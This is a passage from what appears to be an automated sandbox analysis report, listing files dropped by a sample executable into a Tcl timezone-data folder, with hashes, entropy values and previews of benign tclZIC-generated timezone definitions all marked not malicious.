File Type:	Unknown
Category:	dropped
Size (bytes):	146
Entropy (8bit):	4.954140296439627
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5+L6ELsActFkXGm2OHuU7oevUdvcUeNVrCn:SlSWB9X5+Lam2OHb7oezfNAn
MD5:	FD5FB6F6171C8B1FE4B4496E8CCA6C3E
SHA1:	D211CFFF40B2A66C4C6080699D99A69C7040FD90
SHA-256:	A0E47E1C5D4EAEAC532BD9828E74139FB85E7D6B86046BF475E33C2B84C3542F
SHA-512:	C6DF69022CC6C777BF9A7139D1FD8FC892B6DE3065B8923C1D8A9ED9E9E20ACCCE81D4EF61CDDD65FD6B972630A6F64FE6A603975655ED8A8C9B6D27410D4FCD
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Indian/Reunion) {. {-9223372036854775808 13312 0 LMT}. {-1848886912 14400 0 RET}.}.

C:\Users\user\Desktop\tcl\tzdata\Iran Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	161
Entropy (8bit):	4.757854680369306
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8g5YFevFVAIgNqjNAt+XiMr4WFKBun:SlSWB9IZaM3yA5owFVAIgcjSt+Xvr4wh
MD5:	848663FD5F685FE1E14C655A0ABA7D6A
SHA1:	59A1BEE5B3BE01FB9D2C73777B7B4F1615DCE034
SHA-256:	DB6D0019D3B0132EF8B8693B1AB2B325D77DE3DD371B1AFDAE4904BE610BA2A6
SHA-512:	B1F8C08AF68C919DB332E6063647AF15CB9FED4046C16BEF9A58203044E36A0D1E69BD1B8703B15003B929409A8D83238B5AA67B910B920F0674C8A0EB5CF125
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Tehran)]} {. LoadTimeZoneFile Asia/Tehran.}.set TZData(:Iran) $TZData(:Asia/Tehran).

C:\Users\user\Desktop\tcl\tzdata\Israel Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	172
Entropy (8bit):	4.778464205793726
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq85zFFwVAIgN0AzFzt+WXnMr4WFKYzFp:SlSWB9IZaM3yZbwVAIgCAb+zr4wKY7
MD5:	B9D1F6BD0B0416791036C0E3402C8438
SHA1:	E1A7471062C181B359C06804420091966B809957
SHA-256:	E6EC28F69447C3D3DB2CB68A51EDCEF0F77FF4B563F7B65C9C71FF82771AA3E1
SHA-512:	A5981FD91F6A9A84F44A6C9A3CF247F9BE3AB52CE5FE8EE1A7BE19DD63D0B22818BC15287FE73A5EEC8BCE6022B9EAF54A10AA719ADF31114E188F31EA273E92
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Jerusalem)]} {. LoadTimeZoneFile Asia/Jerusalem.}.set TZData(:Israel) $TZData(:Asia/Jerusalem).

C:\Users\user\Desktop\tcl\tzdata\Jamaica Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.668645988954937
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx00EIECpVAIg200EIEvvt9S//2IAcGE0EIEVn:SlSWB9IZaM3y7952VAIgp95vF029095V
MD5:	EA38E93941E21CB08AA49A023DCC06FB
SHA1:	1AD77CAC25DC6D1D04320FF2621DD8E7D227ECBF
SHA-256:	21908F008F08C55FB48F1C3D1A1B2016BDB10ED375060329451DE4E487CF0E5F
SHA-512:	D6F0684A757AD42B8010B80B4BE6542ADE96D140EC486B4B768E167502C776B8D289622FBC48BD19EB3D0B3BC4156715D5CCFC7952A479A990B07935B15D26DC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Jamaica)]} {. LoadTimeZoneFile America/Jamaica.}.set TZData(:Jamaica) $TZData(:America/Jamaica).

C:\Users\user\Desktop\tcl\tzdata\Japan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	159
Entropy (8bit):	4.791469556628492
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8aowVAIgNqaF9hM7/4WFK6n:SlSWB9IZaM3ypwVAIgcaF4r4wK6n
MD5:	338A18DEDF5A813466644B2AAE1A7CF5
SHA1:	BB76CE671853780F4971D2E173AE71E82EA24690
SHA-256:	535AF1A79CD01735C5D6FC6DB08C5B0EAFB8CF0BC89F7E943CF419CFA745CA26
SHA-512:	4D44CC28D2D0634200FEA0537EBC5DD50E639365B89413C6BF911DC2B95B78E27F1B92733FB859C794A8C027EA89E45E8C2D6E1504FF315AF68DB02526226AD2
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Tokyo)]} {. LoadTimeZoneFile Asia/Tokyo.}.set TZData(:Japan) $TZData(:Asia/Tokyo).

C:\Users\user\Desktop\tcl\tzdata\Kwajalein Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	184
Entropy (8bit):	4.759848173726549
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqTQG1/EOM2wFVAIgObT1/EOM8O68/FMKpUDH1/EOMi:SlSWB9IZaM3yc1EiwFVAIgOb1E48xME+
MD5:	A9C8CA410CA3BD4345BF6EAB53FAB97A
SHA1:	57AE7E6D3ED855B1FBF6ABF2C9846DFA9B3FFF47
SHA-256:	A63A99F0E92F474C4AA99293C4F4182336520597A86FCDD91DAE8B25AFC30B98
SHA-512:	C97CF1301DCEEE4DE26BCEEB60545BB70C083CD2D13ED89F868C7856B3532473421599ED9E7B166EA53A9CF44A03245192223D47BC1104CEBD1BF0AC6BF10898
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Kwajalein)]} {. LoadTimeZoneFile Pacific/Kwajalein.}.set TZData(:Kwajalein) $TZData(:Pacific/Kwajalein).

C:\Users\user\Desktop\tcl\tzdata\Libya Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	171
Entropy (8bit):	4.779409803819657
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqsbKJqYkdVAIgNGEnKJuYvW67beDcbKJ9n:SlSWB9IZaM3y7JdVAIgNTnYvW6PeD9n
MD5:	C4739F7B58073CC7C72EF2D261C05C5E
SHA1:	12FE559CA2FEA3F8A6610B1D4F43E299C9FB7BA5
SHA-256:	28A94D9F1A60980F8026409A65F381EDB7E5926A79D07562D28199B6B63AF9B4
SHA-512:	B2DC5CB1AD7B6941F498FF3D5BD6538CAF0ED19A2908DE645190A5C5F40AF5B34752AE8A83E6C50D370EA619BA969C9AB7F797F171192200CDA1657FFFB7F05A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Tripoli)]} {. LoadTimeZoneFile Africa/Tripoli.}.set TZData(:Libya) $TZData(:Africa/Tripoli).

C:\Users\user\Desktop\tcl\tzdata\MET Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7471
Entropy (8bit):	3.7115445412724797
Encrypted:	false
SSDEEP:	96:TJOwNDgaXSgm7VTslzZBYxWq9beN6db6yq3BgLjx1uuE0KRPGdNjClOQuonZ2ltb:bSV7xxWq9aYdbsC/eLdGLg9a
MD5:	2F62D867C8605730BC8E43D300040D54
SHA1:	06AD982DF03C7309AF01477749BAB9F7ED8935A7
SHA-256:	D6C70E46A68B82FFC7A4D96FDA925B0FAAF973CB5D3404A55DFF2464C3009173
SHA-512:	0D26D622511635337E5C03D82435A9B4A9BCA9530F940A70A24AE67EA4794429A5D68B59197B978818BEF0799C3D5FA792F5720965291661ED067570BC56226B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:MET) {. {-9223372036854775808 3600 0 MET}. {-1693706400 7200 1 MEST}. {-1680483600 3600 0 MET}. {-1663455600 7200 1 MEST}. {-1650150000 3600 0 MET}. {-1632006000 7200 1 MEST}. {-1618700400 3600 0 MET}. {-938905200 7200 1 MEST}. {-857257200 3600 0 MET}. {-844556400 7200 1 MEST}. {-828226800 3600 0 MET}. {-812502000 7200 1 MEST}. {-796777200 3600 0 MET}. {-781052400 7200 1 MEST}. {-766623600 3600 0 MET}. {228877200 7200 1 MEST}. {243997200 3600 0 MET}. {260326800 7200 1 MEST}. {276051600 3600 0 MET}. {291776400 7200 1 MEST}. {307501200 3600 0 MET}. {323830800 7200 1 MEST}. {338950800 3600 0 MET}. {354675600 7200 1 MEST}. {370400400 3600 0 MET}. {386125200 7200 1 MEST}. {401850000 3600 0 MET}. {417574800 7200 1 MEST}. {433299600 3600 0 MET}. {449024400 7200 1 MEST}. {465354000 3600 0 MET}. {481078800 7200 1 MEST}. {496803600 3600 0 MET

C:\Users\user\Desktop\tcl\tzdata\MST Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	106
Entropy (8bit):	4.856431808856169
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx56xwkXGm2OHrXV4fvYv:SlSWB9X562m2OHrCi
MD5:	FF6BDAC2C77D8287B46E966480BFEACC
SHA1:	4C90F910C74E5262A27CC65C3433D34B5D885243
SHA-256:	FB6D9702FC9FB82779B4DA97592546043C2B7D068F187D0F79E23CB5FE76B5C2
SHA-512:	CA197B25B36DD47D86618A4D39BFFB91FEF939BC02EEB96679D7EA88E5D38737D3FE6BD4FD9D16C31CA5CF77D17DC31E5333F4E28AB777A165050EA5A4D106BA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:MST) {. {-9223372036854775808 -25200 0 MST}.}.

C:\Users\user\Desktop\tcl\tzdata\MST7MDT Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8227
Entropy (8bit):	3.755606924782105
Encrypted:	false
SSDEEP:	96:xG5c2sGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:12dVUC2mWBNwWTxyWR
MD5:	2AB5643D8EF9FD9687A5C67AEB04AF98
SHA1:	2E8F1DE5C8113C530E5E6C10064DEA4AE949AAE6
SHA-256:	97028B43406B08939408CB1DD0A0C63C76C9A352AEA5F400CE6D4B8D3C68F500
SHA-512:	72A8863192E14A4BD2E05C508F8B376DD75BB4A3625058A97BBB33F7200B2012D92D445982679E0B7D11C978B80F7128B3A79B77938CEF6315AA6C4B1E0AC09C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:MST7MDT) {. {-9223372036854775808 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MST}. {262774800 -21600 1 MDT}. {278496000 -252

C:\Users\user\Desktop\tcl\tzdata\Mexico\BajaNorte Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.836487818373659
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0qfSwVAIg20qfo6AdMSKBbh4IAcGEqfu:SlSWB9IZaM3y7eHVAIgpeo68K5h490eu
MD5:	C3AEEA7B991B609A1CB253FDD5057D11
SHA1:	0212056C2A20DD899FA4A26B10C261AB19D20AA4
SHA-256:	599F79242382ED466925F61DD6CE59192628C7EAA0C5406D3AA98EC8A5162824
SHA-512:	38094FD29B1C31FC9D894B8F38909DD9ED3A76B2A27F6BC250ACD7C1EFF4529CD0B29B66CA7CCBEB0146DFF3FF0AC4AEEEC422F7A93422EF70BF723D12440A93
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Tijuana)]} {. LoadTimeZoneFile America/Tijuana.}.set TZData(:Mexico/BajaNorte) $TZData(:America/Tijuana).

C:\Users\user\Desktop\tcl\tzdata\Mexico\BajaSur Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	186
Entropy (8bit):	4.841665860441288
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0zjRJ+vFVAIg20zjRJZvt6AdMPCoQIAcGEzjRJ3:SlSWB9IZaM3y7zjRJQFVAIgpzjRJ1t6n
MD5:	89A5ED35215BA46C76BF2BD5ED620031
SHA1:	26F134644023A2D0DA4C8997C54E36C053AA1060
SHA-256:	D624945E20F30CCB0DB2162AD3129301E5281B8868FBC05ACA3AA8B6FA05A9DF
SHA-512:	C2563867E830F7F882E393080CE16A62A0CDC5841724E0D507CBA362DB8363BB75034986107C2428243680FE930BAC226E11FE6BA99C31E0C1A35D6DD1C14676
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Mazatlan)]} {. LoadTimeZoneFile America/Mazatlan.}.set TZData(:Mexico/BajaSur) $TZData(:America/Mazatlan).

C:\Users\user\Desktop\tcl\tzdata\Mexico\General Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.8300311016675606
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7zBDdVAIgpzBy6BXl490zBw:MBaIMYzipzU6Bi90zi
MD5:	E771850BA5A1C218EB1B31FDC564DF02
SHA1:	3675838740B837A96FF32694D1FA56DE01DE064F
SHA-256:	06A45F534B35538F32A77703C6523CE947D662D136C5EC105BD6616922AEEB44
SHA-512:	BD7AF307AD61C310EDAF01E618BE9C1C79239E0C8CDEC85792624A7CCE1B6251B0ADE066B8610AFDB0179F3EF474503890642284800B81E599CB830EC6C7C9AA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Mexico_City)]} {. LoadTimeZoneFile America/Mexico_City.}.set TZData(:Mexico/General) $TZData(:America/Mexico_City).

C:\Users\user\Desktop\tcl\tzdata\NZ Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	174
Entropy (8bit):	4.8398862338201765
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqTQG/u4pVAIgObT/NCxL5E1nUDH/uvn:SlSWB9IZaM3ycqIVAIgOboLivn
MD5:	7B274C782E9FE032AC4B3E137BF147BB
SHA1:	8469D17EC75D0580667171EFC9DE3FDF2C1E0968
SHA-256:	2228231C1BEF0173A639FBC4403B6E5BF835BF5918CC8C16757D915A392DBF75
SHA-512:	AE72C1F244D9457C70A120FD00F2C0FC2BDC467DBD5C203373291E00427499040E489F2B1358757EA281BA8143E28FB54D03EDE67970F74DACFCB308AC7F74CE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Auckland)]} {. LoadTimeZoneFile Pacific/Auckland.}.set TZData(:NZ) $TZData(:Pacific/Auckland).

C:\Users\user\Desktop\tcl\tzdata\NZ-CHAT Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.832832776993659
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqTQG9WQ+DdVAIgObT9WQrF5AmtBFB/pUDH9WQpn:SlSWB9IZaM3ycwQ+DdVAIgObwQ5zzJjA
MD5:	C8D83C210169F458683BB35940E11DF6
SHA1:	278546F4E33AD5D0033AF6768EFAB0DE247DA74F
SHA-256:	CECF81746557F6F957FEF12DBD202151F614451F52D7F6A35C72B830075C478D
SHA-512:	4539AE6F7AF7579C3AA5AE4DEB97BD14ED83569702D3C4C3945DB06A2D8FFF260DA1DB21FF21B0BED91EE9C993833D471789B3A99C9A2986B7AC8ABFBBE5A8B7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Chatham)]} {. LoadTimeZoneFile Pacific/Chatham.}.set TZData(:NZ-CHAT) $TZData(:Pacific/Chatham).

C:\Users\user\Desktop\tcl\tzdata\Navajo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	172
Entropy (8bit):	4.80475858956378
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx06RGFwVAIg206RAO0L5vf1+IAcGE6Ru:SlSWB9IZaM3y7+SwVAIgp+iLpd+90+u
MD5:	38C56298E75306F39D278F60B50711A6
SHA1:	8FD9CEAD17CCD7D981CEF4E782C3916BFEF2D11F
SHA-256:	E10B8574DD83C93D3C49E9E2226148CBA84538802316846E74DA6004F1D1534D
SHA-512:	F6AA67D78A167E553B97F092CC3791B591F800A6D286BE37C06F7ECABDFBCF43A397AEDC6E3EB9EB6A1CB95E8883D4D4F97890CA1877930AFCD5643B0C8548E9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Denver)]} {. LoadTimeZoneFile America/Denver.}.set TZData(:Navajo) $TZData(:America/Denver).

C:\Users\user\Desktop\tcl\tzdata\PRC Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	166
Entropy (8bit):	4.854287452296565
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8qvwVAIgNtAnL75h4WFKdv:SlSWB9IZaM3yMwVAIgEH5h4wKt
MD5:	AF9DD8961DB652EE1E0495182D99820D
SHA1:	979602E3C59719A67DE3C05633242C12E0693C43
SHA-256:	9A6109D98B35518921E4923B50053E7DE9B007372C5E4FFF75654395D6B56A82
SHA-512:	F022C3EFABFC3B3D3152C345ACD28387FFEA4B61709CBD42B2F3684D33BED469C4C25F2328E5E7D9D74D968E25A0419E7BCFF0EB55650922906B9D3FF57B06C8
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:PRC) $TZData(:Asia/Shanghai).

C:\Users\user\Desktop\tcl\tzdata\PST8PDT Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8227
Entropy (8bit):	3.751820462019181
Encrypted:	false
SSDEEP:	96:9d89jJC2ZCHtffWsBNwj/lpmlOxGcKcnRH31t+ucgge:49jgNf+aNwj/lpmlOxnKcndIG
MD5:	DB5250A28A3853951AF00231677AACAC
SHA1:	1FC1DA1121B9F5557D246396917205B97F6BC295
SHA-256:	4DFC264F4564957F333C0208DA52DF03301D2FD07943F53D8B51ECCDD1CB8153
SHA-512:	72594A17B1E29895A6B4FC636AAE1AB28523C9C8D50118FA5A7FDFD3944AD3B742B17B260A69B44756F4BA1671268DD3E8223EF314FF7850AFB81202BA2BBF44
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:PST8PDT) {. {-9223372036854775808 -28800 0 PST}. {-1633269600 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-1601820000 -25200 1 PDT}. {-1583679600 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-84376800 -25200 1 PDT}. {-68655600 -28800 0 PST}. {-52927200 -25200 1 PDT}. {-37206000 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -288

C:\Users\user\Desktop\tcl\tzdata\Pacific\Apia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5521
Entropy (8bit):	3.7636237147984435
Encrypted:	false
SSDEEP:	96:2t8v71A1CBb1ZPJ/lU/x4WvZgJNzBNZVm:2t8v71A1iZDg1vSi
MD5:	6317E501CE36F8E669584D7375301366
SHA1:	1BB0BC2697267F3EF405A891784BF5070DE8F0FB
SHA-256:	0BBBAA5FE0F2238378E31D0ADF6F216AEF2B3428EA52D6F2A5A5ABCFBCA08C74
SHA-512:	C7581441B302DCA818825A8B715428C70D638A7FC889939DBF80F60FFB026CBC95C2C09470E4BC1557C1A063A92C3243FD8D8C576C3DD0C85AEE954C16F757B4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Apia) {. {-9223372036854775808 45184 0 LMT}. {-2855737984 -41216 0 LMT}. {-1861878784 -41400 0 SAMT}. {-631110600 -39600 0 WST}. {1285498800 -36000 1 WSDT}. {1301752800 -39600 0 WST}. {1316872800 -36000 1 WSDT}. {1325239200 50400 1 WSDT}. {1333202400 46800 0 WST}. {1348927200 50400 1 WSDT}. {1365256800 46800 0 WST}. {1380376800 50400 1 WSDT}. {1396706400 46800 0 WST}. {1411826400 50400 1 WSDT}. {1428156000 46800 0 WST}. {1443276000 50400 1 WSDT}. {1459605600 46800 0 WST}. {1474725600 50400 1 WSDT}. {1491055200 46800 0 WST}. {1506175200 50400 1 WSDT}. {1522504800 46800 0 WST}. {1538229600 50400 1 WSDT}. {1554559200 46800 0 WST}. {1569679200 50400 1 WSDT}. {1586008800 46800 0 WST}. {1601128800 50400 1 WSDT}. {1617458400 46800 0 WST}. {1632578400 50400 1 WSDT}. {1648908000 46800 0 WST}. {1664028000 50400 1 WSDT}. {1680357600 46800 0

C:\Users\user\Desktop\tcl\tzdata\Pacific\Auckland Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8487
Entropy (8bit):	3.8173754903771018
Encrypted:	false
SSDEEP:	96:WNj7nBIc0fw4eJ7a1N1oKe13aNiWbF8sYBpYhuVn:Cmc3J7a1N18QOs8
MD5:	6C008D6437C7490EE498605B5B096FDB
SHA1:	D7F6E7B3920C54EFE02A44883DBCD0A75C7FC46A
SHA-256:	B5BD438B748BA911E0E1201A83B623BE3F8130951C1377D278A7E7BC9CB7F672
SHA-512:	DA6992D257B1BA6124E39F90DDEE17DC3E2F3B38C3A68B77A93065E3E5873D28B8AE5D21CEC223BAADFBDD1B3A735BF1CEC1BDEB0C4BEAB72AAA23433A707207
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Auckland) {. {-9223372036854775808 41944 0 LMT}. {-3192435544 41400 0 NZMT}. {-1330335000 45000 1 NZST}. {-1320057000 41400 0 NZMT}. {-1300699800 43200 1 NZST}. {-1287396000 41400 0 NZMT}. {-1269250200 43200 1 NZST}. {-1255946400 41400 0 NZMT}. {-1237800600 43200 1 NZST}. {-1224496800 41400 0 NZMT}. {-1206351000 43200 1 NZST}. {-1192442400 41400 0 NZMT}. {-1174901400 43200 1 NZST}. {-1160992800 41400 0 NZMT}. {-1143451800 43200 1 NZST}. {-1125914400 41400 0 NZMT}. {-1112607000 43200 1 NZST}. {-1094464800 41400 0 NZMT}. {-1081157400 43200 1 NZST}. {-1063015200 41400 0 NZMT}. {-1049707800 43200 1 NZST}. {-1031565600 41400 0 NZMT}. {-1018258200 43200 1 NZST}. {-1000116000 41400 0 NZMT}. {-986808600 43200 1 NZST}. {-968061600 41400 0 NZMT}. {-955359000 43200 1 NZST}. {-936612000 41400 0 NZMT}. {-923304600 43200 1 NZST}. {-757425600 43200

C:\Users\user\Desktop\tcl\tzdata\Pacific\Chatham Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7875
Entropy (8bit):	3.897879639687008
Encrypted:	false
SSDEEP:	96:46x7dZGlv6WzAqqHqZnKNzBXaQY6CVXbiMKOVw:4EZqzAqqHqUYFVE
MD5:	57E04BB83BF3FEA0F80DB32D1B2AF477
SHA1:	29F1CB5FC4B5B24177B6345597E859B4BE172557
SHA-256:	CB717076A5F6AD10DF3F6D81D079DC6DE6E600765648A461A2815ADC9D2E9011
SHA-512:	72CE829F71A244CB21BB5752E44016AC6B702647422CE638DE91819D5BD41363EABB8B5142CF375520CED3D16B45B7B4BDC3E1256316062632A28FEAB3E7E626
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Chatham) {. {-9223372036854775808 44028 0 LMT}. {-410271228 45900 0 CHAST}. {152632800 49500 1 CHADT}. {162309600 45900 0 CHAST}. {183477600 49500 1 CHADT}. {194968800 45900 0 CHAST}. {215532000 49500 1 CHADT}. {226418400 45900 0 CHAST}. {246981600 49500 1 CHADT}. {257868000 45900 0 CHAST}. {278431200 49500 1 CHADT}. {289317600 45900 0 CHAST}. {309880800 49500 1 CHADT}. {320767200 45900 0 CHAST}. {341330400 49500 1 CHADT}. {352216800 45900 0 CHAST}. {372780000 49500 1 CHADT}. {384271200 45900 0 CHAST}. {404834400 49500 1 CHADT}. {415720800 45900 0 CHAST}. {436284000 49500 1 CHADT}. {447170400 45900 0 CHAST}. {467733600 49500 1 CHADT}. {478620000 45900 0 CHAST}. {499183200 49500 1 CHADT}. {510069600 45900 0 CHAST}. {530632800 49500 1 CHADT}. {541519200 45900 0 CHAST}. {562082400 49500 1 CHADT}. {573573600 45900 0 CHAST}. {594136800

C:\Users\user\Desktop\tcl\tzdata\Pacific\Chuuk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	146
Entropy (8bit):	5.020357159210726
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx5nUDH9CoFeEXGm2OHIOYvXmdcnWZ8bC:SlSWB9X5ZzLm2OHNYPmdc/bC
MD5:	384B69A22456509C37FCA84DC783FE69
SHA1:	498A077DC6FE4268B548CD1153F4B709DC05D88A
SHA-256:	DFBA5B3067135BF4710D4F7DCDD39A2BFEB6F5DA034DE3169AD974EBA5F6D5F2
SHA-512:	D43659CF2E513774047858D11EE0780C623EAE2F07BACEE311D969B34F809C4A27469175D95623F9E4281B9FEBC74A77C5952519A9B681FA2621C4BE2695A02C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Chuuk) {. {-9223372036854775808 36428 0 LMT}. {-2177489228 36000 0 CHUT}.}.

C:\Users\user\Desktop\tcl\tzdata\Pacific\Easter Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8549
Entropy (8bit):	3.8169772089439093
Encrypted:	false
SSDEEP:	96:MYF9uZ14H1W5SbHM2Kv2kf+PanZQetG5lZNkOvhZGG4/pOP8x:MYF9uZ1GWcb62kf+PanzG5vnpdPi
MD5:	F13A3988AA8D7F97E5119C4E6810EA35
SHA1:	55800318CFE9FDFEB920BB79EFFE0C29690CF59C
SHA-256:	6BA1CA629B4FD6996674C68812A08CEDBFBDA8E35431002B650ECB49964FE450
SHA-512:	43D04D0BFBEF5936DE77E52D8D662639995E03E15686CE8112703F8B273A71B0AD03F1BF15AC952DAEB88DAD3EAEAD28019B845C07139069F30F9636FB5CC922
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Easter) {. {-9223372036854775808 -26264 0 LMT}. {-2524495336 -26248 0 EMT}. {-1178124152 -21600 0 EASST}. {-870552000 -25200 0 EAST}. {-865278000 -21600 1 EASST}. {-740520000 -21600 1 EASST}. {-736376400 -25200 0 EAST}. {-718056000 -25200 0 EAST}. {-36619200 -21600 1 EASST}. {-23922000 -25200 0 EAST}. {-3355200 -21600 1 EASST}. {7527600 -25200 0 EAST}. {24465600 -21600 1 EASST}. {37767600 -25200 0 EAST}. {55915200 -21600 1 EASST}. {69217200 -25200 0 EAST}. {87969600 -21600 1 EASST}. {100666800 -25200 0 EAST}. {118209600 -21600 1 EASST}. {132116400 -25200 0 EAST}. {150868800 -21600 1 EASST}. {163566000 -25200 0 EAST}. {182318400 -21600 1 EASST}. {195620400 -25200 0 EAST}. {213768000 -21600 1 EASST}. {227070000 -25200 0 EAST}. {245217600 -21600 1 EASST}. {258519600 -25200 0 EAST}. {277272000 -21600 1 EASST}. {289969200 -25200 0 EAST}.

C:\Users\user\Desktop\tcl\tzdata\Pacific\Efate Download File
